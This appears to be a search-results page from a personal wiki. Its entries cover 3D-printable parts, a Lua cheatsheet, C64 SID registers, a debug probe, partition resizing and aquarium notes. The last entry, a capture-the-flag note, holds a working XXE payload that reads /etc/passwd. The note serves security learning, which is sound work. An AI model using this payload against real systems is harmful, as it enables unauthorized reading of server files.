Advanced Search
Search Results
168 total results found
Small Parts Tray
Useful tray for keeping small parts, nuts, bolts, screws etc. organized for assembly. parts-tray.FCStd parts-tray.3mf parts-tray.stl
Lua Cheetsheet
Tables Tables are the object in Lua, they can hold values like array (integer index) or any other index like map that is not nil. Create table and append element foo = {} table.insert(foo, "bar") Iterate table as array for i, val in ipairs(foo) do pri...
Filaments
Source: https://help.prusa3d.com/filament-material-guide
Shower Wall Holder
Shower_Wall_Holder.FCStd Shower_Wall_Holder.stl
IKEA Sofa Fix
Ikea_Sofa_Fix.FCStd Ikea_Sofa_Fix.stl
Games on-line
Fantasy consoles Pico8 TIC-80
New Page
Quazar SID Interface
SID Programming https://www.c64-wiki.com/wiki/SID MOS6581_SID_data_sheet.pdf Memory Addresses of the SID Reg Function 0 frequency voice 1 low byte 1 frequency voice 1 high byte 2 pulse wave duty cycle voice 1 low byte ...
Rasberry Pi Debug Probe
CMSIS-DAP UART (U) and I2C connector (D) Does not provide power, target board needs to be powered but mind it needs shared ground Pinout Orange - TX/SC (Output from Probe) Black - GND Yellow - RX/SD (Input to Probe or I/O) Pico connection ...
Nvidia GeForce RTX 3050
TL;DR: Utter piece of hot garbage - literally. Don't buy yesterday, today or ever. Linus was right! H/W GeForce RTX 3050 low profile for compact Dell PC. I needed something below 80W of power drain due to limited power supply (that is rated for 80W GPU). ...
New Page
Expanding parititions
Backup partition table fdixk -x /dev/<dev> sfdisk -d /dev/<dev> > partition.dump Shrinking EXT(2,3,4) file system to minimum size e2fsck -f /dev/<dev partition> resize2fs -M /dev/<dev parition> Editing partition table and restore After shining the last ...
Aquarium
Water quality
Units L Gallons (US) 1 0.264 3.785 1 6 ~1.5 12 ~3 20 ~5 30 ~8 40 ~10 Total Ammonia Nitrogen (NH3/NH4+) to PPM Drop test result * 0.0131 @ 24C, 7.4PH = unionized ammonia. Dangerous level for fish is 0.05. Nitrogen Cycle Source Ammonia ...
Fish
Species Min aquarium size [L] pH °C dGH Size [cm] Neon tetra 40 6-7.5 22-26 1-10 4 Ember tetra 40 6-7.5 22-28 4-10 2-3 Corydoras - black venezuela, albino 60 6-7.5 18-26 3-10 6-7 Dwarf shrimp - yellow 20 ...
Log
Id Fish Introduced Perished 1 Neon tetra 2026-01-09 2026-01-11 2 Neon tetra 2026-01-09 2026-01-20 3 Neon tetra 2026-01-09 2026-01-21 4 Neon tetra 2026-01-09 2026-01-28 5 Neon tetra 2026-01-09 6 Pleco Bulldog 2026-01-09 2026-01-18 7 Neon tet...
CTF
XML injection
XXE XML External Entity <?xml version="1.0"?> <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]> <root>&test;</root>